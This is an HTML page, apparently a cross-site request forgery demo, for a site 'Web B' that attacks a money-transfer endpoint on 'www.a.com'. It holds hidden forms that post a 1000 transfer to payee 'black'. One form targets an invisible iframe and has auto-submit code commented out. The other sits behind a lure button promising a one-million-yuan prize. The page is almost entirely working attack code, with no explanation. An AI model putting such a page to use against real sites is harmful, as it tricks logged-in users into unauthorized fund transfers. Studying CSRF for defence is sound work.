<!DOCTYPE html>
<html>
  <head>
    <title>Web B</title>
    <link rel="stylesheet" href="/stylesheets/style.css" />
  </head>
  <body>
    <h2>Welcome to WebSite B</h2>

    <form name="form" target="csrf" method="post" action="http://www.a.com/api/users/transfer">
      <input name="payee" type="hidden" value="black">
      <input name="amount" type="hidden" value="1000">
    </form>

    <form name="form2" method="post" action="http://www.a.com/api/users/transfer">
      <input name="payee" type="hidden" value="black">
      <input name="amount" type="hidden" value="1000">
      <button type="submit">点击我拿100w元大奖</button>
    </form>

    <a href="http://www.a.com">A</a>
  </body>

  <script>
    const iframe = document.createElement('iframe');
    iframe.name = 'csrf';
    iframe.style.display = 'none';
    document.body.appendChild(iframe);

    // setTimeout(() => {
    //   document.querySelector('[name=form]').submit();
    // }, 1000);
  </script>
</html>
